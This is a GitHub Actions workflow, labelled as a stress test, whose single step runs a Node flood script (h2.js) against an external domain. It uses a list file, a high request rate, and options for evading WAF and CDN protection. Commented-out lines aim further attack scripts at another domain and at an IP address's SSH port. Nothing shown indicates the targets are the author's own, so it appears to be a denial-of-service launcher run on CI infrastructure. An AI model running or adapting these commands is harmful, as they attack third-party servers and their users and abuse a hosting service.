name: UDP/HTTP/HTTPS 压测（纯 Node）

on:
  workflow_dispatch:

jobs:
  flood-test:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Install Node (默认已装)
        run: node -v   # 可选，确保 Node≥14

      # 只要阈值不满足，这一步会返回非 0，GitHub 自动标记为 failed
      - name: Run flood test (quiet)
        run: |
          node h2.js http://pyhjwno.cn   cc.txt 21000 80 2 4 GET --waf --mode full --random-speed --auto-switch --cdn
          # python3 exploit-test.py queryw.thvlb.cn 80 --no-ssl --mode nginx --threads 50 --streams 150 --headers 16374
          # sudo python 12.py 38.55.196.88 22
          # python3 15.py 38.55.196.88 22 300
